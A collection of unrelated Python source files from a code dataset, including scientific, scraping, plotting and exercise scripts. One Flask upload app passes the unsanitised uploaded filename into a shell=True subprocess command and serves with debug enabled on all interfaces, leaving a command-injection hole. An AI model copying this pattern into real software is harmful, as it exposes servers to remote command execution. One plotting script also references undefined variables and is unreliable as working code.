offsets)\n\t\tif match:\n\t\t\tfm.write(match)\n\t\t\tfw.write(word)\n\t\telse:\n\t\t\tfm.write('x' * len(word))\n\t\t\tfw.write('x' * len(word))\n\t\ndef setOffsets(words):\n\toffsets = []\n\toffsets.append(0)\n\tlength = len(words[0])\n\tfor i in range(0, len(words)):\n\t\tif length != len(words[i]):\n\t\t\toffsets.append(i)\n\t\t\tlength = len(words[i])\n\treturn offsets\n\ndef matchWord(c, word, words, offsets):\n\tlength = len(word)\n\tindex = 0\n\twhile len(words[offsets[index]]) != 
length:\n\t\tindex += 1\n\tstart = offsets[index]\n\tend = offsets[index+1]\n\tsublist = words[start:end]\n\tpWord = xorBytes(word, c).decode(\"utf8\")\n\tprint(pWord)\n\tif pWord in sublist:\n\t\treturn pWord\n\telse:\n\t\treturn None\n\ndef xorBytes(a,b):\n\tc = bytearray([])\n\tfor byte in range(0, len(b)):\n\t\tc.append(a[byte] ^ b[byte])\n\treturn c\n\n\ndef traverse(word, words, plaintext, offsets):\n\tlength = len(word)\n\ta = bytearray(word,'utf8') #drop newline\n\tfor i in range(0, len(plaintext)):\n\t\tb = bytearray(plaintext[i:i+length])\n\t\tc = xorBytes(a,b)\n\t\tif any(val > 122 or val < 65 for val in c):\n\t\t\tcontinue\n\t\telse:\n\t\t\tprint(\"match check\")\n\t\t\tprint(a)\n\t\t\tprint(b)\n\t\t\tprint(c)\n\t\t\tmatch = matchWord(c, a, words, offsets)\n\t\t\tif match != None:\n\t\t\t\tprint(\"match at \", i, \": \" + word + \" with \" + match)\t\t\n\treturn match\n\n\nif __name__ == \"__main__\":\n\trun(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"pxpa.py","file_name":"pxpa.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"355431381","text":"\"\"\"\nparse_inference_args.py\n\nImplements method for parsing command line arguments for `gauge_model.py`\n\nAuthor: Sam Foreman (github: @saforem2)\nDate: 04/09/2019\n\"\"\"\nimport sys\nimport argparse\nimport shlex\n\n# from config import process_config\n# from attr_dict import AttrDict\n\nDESCRIPTION = (\n \"\"\"Run inference, either by loading a trained model from a checkpoint\n (specified by the `--log_dir` flag) or with generic HMC by creating a new\n `GaugeModel` instance.\"\"\"\n)\n\n\n# =============================================================================\n# * NOTE:\n# - if action == 'store_true':\n# The argument is FALSE by default. Passing this flag will cause the\n# argument to be ''stored true''.\n# - if action == 'store_false':\n# The argument is TRUE by default. Passing this flag will cause the\n# argument to be ''stored false''.\n# =============================================================================\ndef parse_args():\n \"\"\"Parse command line arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description=DESCRIPTION,\n fromfile_prefix_chars='@',\n )\n parser.add_argument('--overwrite',\n dest='overwrite',\n required=False,\n action='store_true',\n help=(\"\"\"Flag that when passed will overwrite existing\n run directory with new inference data.\"\"\"))\n\n parser.add_argument('--log_dir',\n dest='log_dir',\n required=False,\n default=None,\n help=(\"\"\"Path to `log_dir` containing trained model on\n which to run inference.\"\"\"))\n\n parser.add_argument(\"--run_steps\",\n dest=\"run_steps\",\n type=int,\n default=2000,\n required=False,\n help=(\"\"\"Number of evaluation 'run' steps to perform\n after training (i.e. length of desired chain\n generate using trained L2HMC sample).\n (Default: 5000)\"\"\"))\n\n parser.add_argument(\"--beta\",\n dest=\"beta\",\n type=float,\n default=None,\n required=False,\n help=(\"\"\"Flag specifying a singular value of beta at\n which to run inference using the trained\n L2HMC sampler. 
(Default: None\"\"\"))\n\n parser.add_argument(\"--eps\",\n dest=\"eps\",\n type=float,\n default=None,\n required=False,\n help=(\"\"\"Flag specifying value of `eps` to use.\"\"\"))\n\n parser.add_argument(\"--charge_weight\",\n dest=\"charge_weight\",\n type=float,\n default=0.1,\n required=False,\n help=(\"\"\"Multiplicative factor used to weigh relative\n strength of top. charge term in loss\n function.\\n (Default: 0.)\"\"\"))\n\n parser.add_argument(\"--plaq_weight\",\n dest=\"plaq_weight\",\n type=float,\n default=10.,\n required=False,\n help=(\"\"\"Multiplicative factor used to weigh relative\n strength of plaquette difference term in loss\n function.\\n (Default: 0.)\"\"\"))\n\n #################################\n # Flags for running generic HMC\n #################################\n\n parser.add_argument('--hmc',\n dest='hmc',\n action='store_true',\n required=False,\n help=\"\"\"Run generic HMC.\"\"\")\n\n parser.add_argument('--x_shape',\n dest='x_shape',\n type=lambda s: [int(i) for i in s.split(',')],\n default=\"128, 16, 16, 2\",\n required=False,\n help=(\"\"\"Specifies the shape of our data, with:\n x_shape =\n (batch_size, time_size, space_size, dim)\n Defaults to: (128, 16, 16, 2)\"\"\"))\n\n parser.add_argument(\"-n\", \"--num_steps\",\n dest=\"num_steps\",\n type=int,\n default=None,\n required=False,\n help=(\"\"\"Number of leapfrog steps to use in (augmented)\n HMC sampler.\\n(Default: 5)\"\"\"))\n\n if sys.argv[1].startswith('@'):\n args = parser.parse_args(shlex.split(open(sys.argv[1][1:]).read(),\n comments=True))\n else:\n args = parser.parse_args()\n\n return args\n","sub_path":"l2hmc-qcd/utils/parse_inference_args.py","file_name":"parse_inference_args.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"607920914","text":"from flask import Flask, render_template, request, send_file\nfrom werkzeug.utils import secure_filename\nimport os\nimport subprocess\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n# handle file uploads\n@app.route('/fileUpload', methods = ['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n # save path + file name\n filename = f.filename\n path = '/tmp/'\n f.save(path + secure_filename(filename))\n uploadpath = \" \" + path + filename + \" \"\n\n subprocess.call([\"/usr/bin/dangerzone-container\" \" documenttopixels --document-filename\" + uploadpath + \"--pixel-dir /tmp/dangerzone-pixel --container-name flmcode/dangerzone\"], shell=True)\n subprocess.call([\"/usr/bin/dangerzone-container\" \" pixelstopdf --pixel-dir /tmp/dangerzone-pixel --safe-dir /tmp/dangerzone-safe --container-name flmcode/dangerzone --ocr 0 --ocr-lang eng\"], shell=True)\n\n os.rename(\"/tmp/dangerzone-safe/safe-output-compressed.pdf\", \"/tmp/dangerzone-safe/\" + filename + \"_\" + \"safe-output.pdf\")\n\n return send_file(\"/tmp/dangerzone-safe/\" + filename + \"_\" + \"safe-output.pdf\", mimetype='application/pdf')\n\n\nif __name__ == '__main__':\n # run the server\n app.run(host='0.0.0.0',port=5000,debug = True)\n","sub_path":"dangerzone_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"262071712","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport datetime as dt \r\nimport pandas_datareader.data as web\r\nimport pandas as pd\r\nfrom scipy.optimize import 
minimize\r\nfrom scipy import log\r\nfrom scipy import exp\r\nfrom numpy import array\r\nfrom numpy import delete\r\nfrom numpy import sum\r\nfrom numpy.linalg import inv\r\nfrom numpy import transpose as tp\r\nfrom matplotlib import cm\r\nfrom scipy.stats.stats import pearsonr\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\nksp = web.get_data_google('KRX:KOSPI', dt.datetime(2010,7,17), dt.datetime(2017,1,20))\r\nstock=web.get_data_google('KRX:039490', dt.datetime(2010,7,17), dt.datetime(2017,1,20))\r\n\r\ny=delete(log(array(stock['Close'])/array(stock['Open'])),[0,1])\r\nx1=log(delete(array(ksp['Close']),0)/delete(array(ksp['Close']),array(ksp['Close']).size-1))\r\nx1=delete(x1,x1.size-1)\r\nx2=log(delete(array(stock['Close']),0)/delete(array(stock['Close']),array(stock['Close']).size-1))\r\nx2=delete(x2,x2.size-1)\r\nx3=delete(array(ksp['Volume']),[0,array(stock['Volume']).size-1])\r\nx3=x3/1000\r\n\r\nvariable=array([[y.size,sum(x1),sum(x2),sum(x3)],[sum(x1),x1@x1.T,x1@x2.T,x1@x3.T],\r\n [sum(x2),x2@x1.T,x2@x2.T,x2@x3.T],[sum(x3),x3@x1.T,x3@x2.T,x3@x3.T]])\r\nexpect=array([[sum(y)],[y@x1.T],[y@x2.T],[y@x3.T]])\r\ncoef=inv(variable)@expect\r\n\r\nsysearn=array([])\r\nconearn=array([])\r\navearn=array([])\r\nprofit=1\r\naverage=1\r\nexya=array([])\r\nfor i in range(y.size-1):\r\n exy=coef[0]+x1[i]*coef[1]+x2[i]*coef[2]+x3[i]*coef[3]\r\n average=average*(1+y[i])\r\n exya=np.append(exya,exy)\r\n avearn=np.append(avearn,stock['Close'][i+2]/stock['Close'][2])\r\n if exy>0:\r\n profit=profit*(1+y[i])\r\n conearn=np.append(conearn,average)\r\n sysearn=np.append(sysearn,profit)\r\n if i>1400:\r\n print(ksp.index[i+2],average,profit,stock['Close'][i+2]/stock['Close'][2])\r\nvdf=[x1,x2,x3,y]\r\nvcoef=np.zeros((4,4))\r\nfor u in range (4):\r\n for v in range (4):\r\n vcoef[u,v]=pearsonr(vdf[u],vdf[v])[0]\r\nprint(\"regression coefficient\")\r\nprint(coef.T)\r\nprint(\"variable correlation array\")\r\nprint(vcoef)\r\nexcoef=np.zeros(4)\r\nfor u in range (4):\r\n excoef[u]=pearsonr(exya,delete(vdf[u],vdf[u].size-1))[0]\r\nprint(\"explanatory variable correlation array\")\r\nprint(excoef)\r\n\r\npd.DataFrame(np.append(np.append([conearn],[sysearn],axis=0),[avearn],axis=0)\r\n .T,columns=['control','experimental','average']).plot()\r\n\r\nfig = plt.figure()\r\nmarkers=['o' if exya[i]>0 else 'x' for i in range(exya.size)]\r\nax = fig.add_subplot(111, projection='3d')\r\nx1m=array([])\r\nx2m=array([])\r\nx3m=array([])\r\nym=array([])\r\nfor i in range(y.size-1):\r\n if exya[i]>0:\r\n x1m=np.append(x1m,x1[i])\r\n x2m=np.append(x2m,x2[i])\r\n x3m=np.append(x3m,x3[i])\r\n ym=np.append(ym,y[i])\r\np=ax.scatter(x1m, x2m, x3m, c=ym, cmap=plt.hot(), marker='o')\r\nx1m=array([])\r\nx2m=array([])\r\nx3m=array([])\r\nym=array([])\r\nfor i in range(y.size-1):\r\n if exya[i]<0:\r\n x1m=np.append(x1m,x1[i])\r\n x2m=np.append(x2m,x2[i])\r\n x3m=np.append(x3m,x3[i])\r\n ym=np.append(ym,y[i])\r\np=ax.scatter(x1m, x2m, x3m, c=ym, cmap=plt.hot(), marker='x')\r\nfig.colorbar(p,ax=ax)\r\nplt.show()\r\n","sub_path":"pandasmultiregressionmatplot.py","file_name":"pandasmultiregressionmatplot.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"513244","text":"# http://lifelines.readthedocs.io/en/latest/Survival%20analysis%20with%20lifelines.html\n\nfrom matplotlib.pylab import plt\nfrom lifelines.datasets import load_dd\nfrom lifelines import KaplanMeierFitter\n\ndata = load_dd()\n\n# checking proportional hazards assumption\n# 
https://www.stat.ubc.ca/~rollin/teach/643w04/lec/node69.html\n\n# if the curves are parallel (and hence do not cross each other),\n# then it's likely the variable satisfies the assumption.\n# if the curves do cross, likely you'll have to \"stratify\" the variable\n\n# In lifelines, the KaplanMeierFitter object has a .plot_loglogs function for this purpose\n\ndemocracy_0 = data.loc[data['democracy'] == 'Non-democracy']\ndemocracy_1 = data.loc[data['democracy'] == 'Democracy']\n\nkmf0 = KaplanMeierFitter()\nkmf0.fit(democracy_0['duration'], event_observed=democracy_0['observed'])\n\nkmf1 = KaplanMeierFitter()\nkmf1.fit(democracy_1['duration'], event_observed=democracy_1['observed'])\n\nfig, axes = plt.subplots()\nkmf0.plot_loglogs(ax=axes)\nkmf1.plot_loglogs(ax=axes)\n\naxes.legend(['Non-democracy', 'Democracy'])\n\nplt.show()\n\n","sub_path":"StatisticProblem/lifelinesSampleCode/checkingProp.py","file_name":"checkingProp.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"497711359","text":"'''\n 02/21/2019\n Python 1 - Spring 2019\n Loopy in-class assignment :) - Calculate an average grade\n\n This program asks the user to enter as many grades as they like, and\n this will tally an average for them.\n\n\nIn-class assignment to turn in:\nRedo your grading assignment from a couple of weeks ago, but this time with loops!\n \nAlso, instead of taking in three grades, have it take grades until the user indicates \nthey are finished (using a sentinel value). \n\nYour program should only accept valid grades (from 0 to 100). \n\nOutput the average grade to one decimal place, with a helpful message to the user. \n(Don’t use round().)\n\n\n1) Turn in the planning document and the code you've written as of the end of the class. \n If you don't finish, it's fine; just be sure to turn in your finished code with your homework.\n'''\n\n#Display a welcome message & usage info to user\nprint(\"Welcome to the grade average calculator!\")\nprint(\"Please provide as many grade numbers (not letters!) and I will average them for you.\") \n\n# Initialize variables\ngrade_sum = 0.0 # accumulator\ngrade_count = 1 # counter\n\n#Get user input\ngrade = input(\"Please enter a grade between 0 - 100 or 'q' to quit: \")\n\n#A little more input validation, in case user enters another letter\nwhile grade.isalpha() and grade != 'q': #read about this function in Mark lutz' _Learning Python_ \n grade = input(\"Sorry, that is not a valid input, please enter a grade between 0 - 100 or 'q' to quit: \")\n \n# While sentinal isn't tripped, keep a count and running tally\nwhile grade != 'q':\n # Cast the input to a float\n grade = float(grade)\n \n # While user input is invalid, ask them for valid input\n while grade < 0 or grade > 100:\n grade = input(\"Problem! 
Please enter a valid grade between 0 - 100: \")\n grade = float(grade)\n \n # Calculate the running tallies\n grade_count += 1\n grade_sum = grade + grade_sum \n \n grade = input(\"Please enter a grade between 0 - 100 or 'q' to quit: \")\n while grade.isalpha() and grade != 'q': #same as line 39_ \n grade = input(\"Sorry, that is not a valid input, please enter a grade between 0 - 100 or 'q' to quit: \")\n \n# Calculate a sum of the grades\n\n# if user enters letters and then quits, show this message \nif grade_count - 1 == 0:\n print(\"Thank you for using this tool\")\n\n# After user quits, display the final calculated results\nelse: \n print(\"The average of the\" , grade_count - 1, \"scores you entered is\" , format(grade_sum / (grade_count - 1), '.1f') ) \n\n","sub_path":"assignments/assignment-05/homework_05_inClass.py","file_name":"homework_05_inClass.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"58751520","text":"from preprocess.functions.month_to_crimes import *\nimport folium\nimport webbrowser\nfrom folium.plugins import HeatMap\nimport json\n\npath_csv1 = \"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/preprocess/processed_csvs/arrest_location2018.csv\"\ncrimes_df = pd.read_csv(path_csv1)\n\npath_csv = \"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/preprocess/processed_csvs/Police_Stations_processed.csv\"\npolice_df = pd.read_csv(path_csv)\n#police_df.loc[police_df['DISTRICT'] == 'Headquarters','DISTRICT'] = '0' # Headquaters -> 0\n#police_df['DISTRICT'] = police_df['DISTRICT'].astype(np.uint8) # 'DISTRICT' type -> uint8\n\nmap = folium.Map(location=(41.881832,-87.623177), zoom_start=12)\n\n# definition of the boundaries in the map\ndistrict_geo = r'/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/ChicagoCrimes/boundaries.json'\n\n# calculating total number of incidents per district\ncrimedata2 = pd.DataFrame(crimes_df['District'].value_counts().astype(float))\ncrimedata2.to_json('./crimeagg.json')\ncrimedata2 = crimedata2.reset_index()\ncrimedata2.columns = ['District', 'Number']\nprint(crimes_df.columns)\n# creation of the choropleth\n\narrests_district = crimes_df[['Arrest', 'District']].groupby(['District'], as_index=False).agg('sum')\n\nfolium.Choropleth(\n geo_data='./crimeagg.json',\n name='Chicago Districts',\n data=arrests_district,\n columns=['District', 'Arrest'],\n key_on='feature.id',\n fill_color='YlOrBr',\n fill_opacity=0.7,\n line_opacity=0.1\n).add_to(map)\n\nfolium.LayerControl().add_to(map)\n\n#map.render()\nmap.save(\"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/maps/map1.html\")\nwebbrowser.open(\"/home/maresoc870/Documents/Stopien_II/Semestr_2/AS/Code2/CRIMES/maps/map1.html\")\n\n","sub_path":"visualisations/map_folium/wards_map.py","file_name":"wards_map.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"402206951","text":"import requests\n\n\n# Crawl the first thousand pages of a Baidu Tieba forum\n\nclass Spider:\n def __init__(self, name):\n self.name = name\n self.url_temp = \"https://tieba.baidu.com/f?kw=\" + name + \"&ie=utf-8&pn={}\"\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\"}\n\n def get_url_list(self): # build the url list\n\n return [self.url_temp.format(i * 50) for i in range(1000)] # crawl the forum's first 1000 pages\n\n def parse_url(self, url):\n 
response = requests.get(url, headers=self.headers)\n return response.content.decode()\n\n def save_html(self, html_str, page_num):\n file_path = '{}--page{}.html'.format(self.name, page_num)\n with open(file_path, 'w', encoding='utf-8') as f:\n f.write(html_str)\n\n def run(self): # main logic\n # 1. build the urls\n url_list = self.get_url_list()\n # 2. iterate, send requests, get responses\n for url in url_list:\n html_str = self.parse_url(url)\n page_num = url_list.index(url) + 1 # page number\n # 3. save\n self.save_html(html_str, page_num)\n\n\nif __name__ == '__main__':\n tieba_spider = Spider(\"dota2\")\n tieba_spider.run()\n","sub_path":"01_tieba.py","file_name":"01_tieba.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"502895857","text":"#coding=utf-8\n'''\nauthor: @supercaizehua\ndate: 2020-7-2 05:06:52\n---------------------------------------------------------------\nUnderstanding the problem:\nThe input string contains only the 3 kinds of bracket pairs.\nOutput whether the string is valid.\nValidity conditions:\n- An opening bracket must be closed by a closing bracket of the same type.\n- Opening brackets must be closed in the correct order; [(]) is not a valid string.\n'''\n\n'''\n1. Brute force\nLoop, replacing every matched pair of valid brackets with the empty string.\nTime O(n^2), space O(1). Why O(n^2)?\n'''\nclass Solution1:\n def isValid(self, s: str) -> bool:\n L = len(s)\n L1 = L\n if L % 2 != 0: return False\n while L:\n s = s.replace('{}', '').replace('[]', '').replace('()', '')\n L = len(s) \n if L == L1: return False\n L1 = L\n return True\n\nclass Solution1_1:# a guru on the international site -- pythonic is unbeatable!\n def isValid(self, s: str) -> bool:\n while '[]' in s or '()' in s or '{}' in s:\n s = s.replace('{}', '').replace('[]', '').replace('()', '')\n return not len(s)\n'''\n2. Stack\n- Push opening brackets onto the stack; on a closing bracket, pop the matching opening bracket off the top.\n- Build a hash table with opening brackets as keys and closing brackets as values, for O(1) matching lookups.\n\nEdge cases\n- When the stack is empty, stack.pop() raises an error; just like adding a dummy head to a linked list, we can seed the stack with an initial value and declare that k-v pair in the hash table.\n- If s ends with opening brackets, the stack still holds unpopped opening brackets after traversing all of s, so a final check is needed.\n\nTime O(n), space O(n)\n'''\nclass Solution2:\n def isValid(self, s: str) -> bool:\n dic = {'{':'}', '[':']', '(':')', '0':'0'}\n stack = ['0']\n for i in s:\n if i in dic: \n stack.append(i)\n elif dic[stack.pop()] != i:\n return False\n return stack.pop() == '0'","sub_path":"Week01/20-valid-parentheses.py","file_name":"20-valid-parentheses.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"315533096","text":"from martelo import *\n\n\ndef process(i):\n info = {'id': i}\n\n link = 'http://fatalities.dmp.wa.gov.au/fatalities/detail.asp?id=%s' % i\n r = requests.get(link)\n soup = soupify(r)\n\n table = select(soup, 'div#01SuggestionPositioningAnchor table')[0]\n _temp = [[col.text for col in select(row, 'td')] for row in select(table, 'tr')]\n\n two = filter(lambda l: len(l) == 2, _temp)\n one = filter(lambda l: len(l) == 1, _temp)\n\n for key, value in two:\n key = key.lower().replace(':', '').encode('utf-8')\n value = value.replace(' ', '').strip().encode('utf-8')\n if value != '':\n info[key] = value\n\n for o in one:\n o = o[0]\n o = o.replace(' ', '').strip().encode('utf-8')\n if o and 'report' in o.lower():\n info['report type'] = o.lower()\n\n return info\n\nimport multiprocessing\n\npool = multiprocessing.Pool()\ndata = pool.map(process, (i for i in range(1, 652)))\ndata2xls(data, sample=True)\n\n# for i in range(1, 652):\n# print process(i)\n# break\n","sub_path":"fatalities.dmp.wa.gov.au/mining.py","file_name":"mining.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"523268202","text":"def intersection(arrays):\n # instantiate dict for key value - num and 
count\n itemcount = dict()\n # initialize array to add the intersections\n result = []\n\n # iteration over the arr list\n for i, nums in enumerate(arrays):\n # then iterate over the list in the larger list\n for num in nums:\n # if item has a count already and index > 1, we increment the count\n if itemcount.get(num) is not None and i > 0:\n # num becomes the key and increment curr val by one\n itemcount[num] = itemcount[num] + 1\n # if no entry with num in dict set index to one\n elif itemcount.get(num) is None and i == 0:\n itemcount[num] = 1\n else:\n continue\n\n for numb in itemcount:\n # if number count == array.length()\n if itemcount[numb] == len(arrays):\n # append the number to the intersection list\n result.append(numb)\n\n return result\n\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000,2000000)) + [1,2,3])\n arrays.append(list(range(2000000,3000000)) + [1,2,3])\n arrays.append(list(range(3000000,4000000)) + [1,2,3])\n\n print(intersection(arrays))\n","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"277701281","text":"import heapq\nfrom math import hypot\n\n\nclass Solution(object):\n\n def kClosest(self, points, K):\n \"\"\"\n We have a list of points on the plane. Find the K closest points to the origin (0, 0).\n\n (Here, the distance between two points on a plane is the Euclidean distance.)\n\n You may return the answer in any order. The answer is guaranteed to be unique (except for the order that it is\n in.)\n\n Note:\n 1 <= K <= points.length <= 10000\n -10000 < points[i][0] < 10000\n -10000 < points[i][1] < 10000\n\n 83 / 83 test cases passed.\n Status: Accepted\n Runtime: 676 ms\n Memory Usage: 19.3 MB\n\n\n Parameters\n ----------\n points : list\n\n K : int\n\n\n Returns\n -------\n ret : list\n\n\n Examples\n --------\n >>> Solution().kClosest([[1, 3], [-2, 2]], 1)\n [[-2,2]]\n\n >>> Solution().kClosest([[3, 3], [5, -1], [-2, 4]], 2)\n [[3, 3], [-2, 4]]\n \"\"\"\n\n heap = []\n for point in points:\n if len(heap) < K:\n heapq.heappush(heap, (-hypot(point[0], point[1]), point))\n else:\n heapq.heappushpop(heap, (-hypot(point[0], point[1]), point))\n\n return [_[1] for _ in heap]\n","sub_path":"algorithms/may_challenge/30_K_Closest_Points_to_Origin.py","file_name":"30_K_Closest_Points_to_Origin.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"59202699","text":"# Created byMartin.cz\n# Copyright (c) Martin Strohalm. 
All rights reserved.\n\nimport pero\n\n\nclass DrawTest(pero.Graphics):\n \"\"\"Test case for path bbox calculation.\"\"\"\n \n \n def draw(self, canvas, *args, **kwargs):\n \"\"\"Draws the test.\"\"\"\n \n # clear canvas\n canvas.fill(pero.colors.White)\n \n # init glyphs\n pather = pero.Pather(\n show_handles = False)\n \n bbox = pero.Rect(\n line_color = pero.colors.Red,\n fill_color = None)\n \n # rect\n path = pero.Path().rect(50, 50, 100, 100)\n matrix = pero.Matrix().rotate(pero.rads(45), x=100, y=100)\n path.transform(matrix)\n pather.draw(canvas, path=path)\n \n box = path.bbox()\n bbox.draw(canvas, x=box.x, y=box.y, width=box.width, height=box.height)\n \n # circle\n path = pero.Path().circle(250, 100, 50)\n matrix = pero.Matrix().rotate(pero.rads(45), x=250, y=100)\n path.transform(matrix)\n pather.draw(canvas, path=path)\n \n box = path.bbox()\n bbox.draw(canvas, x=box.x, y=box.y, width=box.width, height=box.height)\n \n # path\n path = pero.Path() \\\n .move_to(380, 50) \\\n .curve_to(450, 50, 310, 150, 380, 150) \\\n .curve_to(450, 150, 310, 50, 380, 50)\n \n matrix = pero.Matrix().rotate(pero.rads(45), x=380, y=100)\n path.transform(matrix)\n pather.draw(canvas, path=path)\n \n box = path.bbox()\n bbox.draw(canvas, x=box.x, y=box.y, width=box.width, height=box.height)\n\n\n# run test\nif __name__ == '__main__':\n pero.debug(DrawTest(), 'show', \"Path Bounding Box\", 450, 200)\n","sub_path":"examples/drawing/draw_path_bbox.py","file_name":"draw_path_bbox.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"214836894","text":"import numpy as np\nfrom ROOT import *\n#from helper.helper import tConvert,calcVelo,makeCumul,percentage,new_arr,diff,delta\nfrom helper.laufen import *\n#import os\n#import time\n#from datetime import date\ndef main():\n\n #km5,t5,bpm,day,km1,t1,km2,t2,km3,t3,km4,t4= np.genfromtxt('data.txt', unpack=True)\n minute,second,km,bpm,bpm_max,day,month,year= np.genfromtxt('../../dataLight2.txt', unpack=True)\n bpm=bpm.astype('d')\n bpm_max=bpm_max.astype('d')\n day=day.astype('d')\n # t1,t1min = tConvert(t1)\n # vel1=calcVelo(km5,t5)\n # t2,t2min = tConvert(t2)\n # vel2=calcVelo(km5,t5)\n # t3,t3min = tConvert(t3)\n # vel3=calcVelo(km5,t5)\n # t4,t4min = tConvert(t4)\n # vel4=calcVelo(km5,t5)\n t5,t5min = tConvert(t5)\n vel5=calcVelo(km5,t5)\n\n c1 = TCanvas(\"LaufKumul\",\"laufkumul\",200,9,700,500)\n MakeCumulPlot(c1,day,km5)\n\n c2 = TCanvas(\"ProzentGelaufen\",\"anteil\",915,9,700,500)\n MakePercPlot(c2,day)\n\n c3 = TCanvas(\"bpm_avg\",\"bpm_avg\",200,9,700,500)\n MakeBPMPlots(c3,day,bpm)\n\n c4= TCanvas(\"ZeitStrecke\",\"ZeitStrecke\", 915,567,700,500)\n Make2DPlot(c4,t5min,km5)\n\n c11= TCanvas(\"ZeitStrecke_old\",\"ZeitStrecke_old\", 915,567,700,500)\n MakeOld2DPlot(c11,t5min,km5)\n\n c5 = TCanvas(\"bpm_max\",\"bpm_max\",200,9,700,500)\n MakeBPMPlots(c5,day,bpm_max,option=\"max\")\n\n c6 = TCanvas(\"laufen2016\",\"laufen\",1200,1000)\n MakeFourPlots(c6,day,t5min,vel5)\n\n c7 = TCanvas(\"tag\", \"TagGelaufen\",1200,1000)\n MakeDayPlot(c7,day)\n\n c8 = TCanvas(\"monat\", \"MonatGelaufen\",1200,1000)\n MakeMonthPlot(c8,day,2016)\n\n c12 = TCanvas(\"monat_km\", \"MonatKMGelaufen\",1200,1000)\n MakeMonthKMPlot(c12,day,2016,km5)\n\n c13 = TCanvas(\"zeitprokm\", \"zeitprokm\",1200,1000)\n MakeMPKPlot(c13,vel5)\n\n c10 = TCanvas(\"LBLcomp\", \"LBL comparison\",1200,1000)\n MakeLBLPlot(c10,day,vel5)\n\n gew,day1= np.genfromtxt('../../stats.txt', unpack=True)\n 
gew=gew.astype('d')\n day1=day1.astype('d')\n\n c9 = TCanvas(\"gewicht\",\"gewicht\",200,9,1400,500)\n MakeStats(c9,day1,gew,day)\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"python/rootversion/laufen_2.py","file_name":"laufen_2.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"256507993","text":"# coding: utf-8\nimport argparse\nimport time\nimport math\nimport os, sys\nimport tempfile\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nfrom data_utils import get_lm_corpus\nfrom mem_transformer import MemTransformerLM\nfrom utils.exp_utils import get_logger\n\nparser = argparse.ArgumentParser(description='PyTorch Transformer Language Model')\nparser.add_argument('--data', type=str, default='../data/web-dsp/',\n help='location of the data corpus')\nparser.add_argument('--tmp', type=str, default='tmp/t',\n help='location of the temporary file used in this tool')\nparser.add_argument('--out-dir', type=str, default='generated',\n help='location of the output directory')\nparser.add_argument('--nbest-file', type=str, default='../../nbest/devel/chain-200best-morph/text',\n help='location of the nbest file')\nparser.add_argument('--models', type=str, default='20191112-102012 20191022-134318',\n help='list of model ids to be used for rescoring')\nparser.add_argument('--sent-sep', type=str, default='',\n help='sentence separator symbol')\nparser.add_argument('--dataset', type=str, default='wdtrain',\n choices=['Ktrain', 'wdtrain', 'wdtrain-morph'],\n help='dataset name')\nparser.add_argument('--ext-len', type=int, default=0,\n help='length of the extended context')\nparser.add_argument('--mem-len', type=int, default=0,\n help='length of the retained previous heads')\nparser.add_argument('--clamp-len', type=int, default=-1,\n help='max positional embedding index')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA')\nparser.add_argument('--work-dir', type=str, default='./',\n help='path to the work_dir')\nparser.add_argument('--same-length', action='store_true',\n help='set same length attention with masking')\nargs = parser.parse_args()\n\nassert args.ext_len >= 0, 'extended context length must be non-negative'\n\nif torch.cuda.is_available():\n if not args.cuda:\n print('WARNING: You have a CUDA device, so you should probably run with --cuda')\n\ndevice = torch.device('cuda' if args.cuda else 'cpu')\n\n# Load dataset\nall_ids = []\nspace_counter = 0\ntmpfile = open(args.tmp, 'w', encoding='utf-8')\nwith 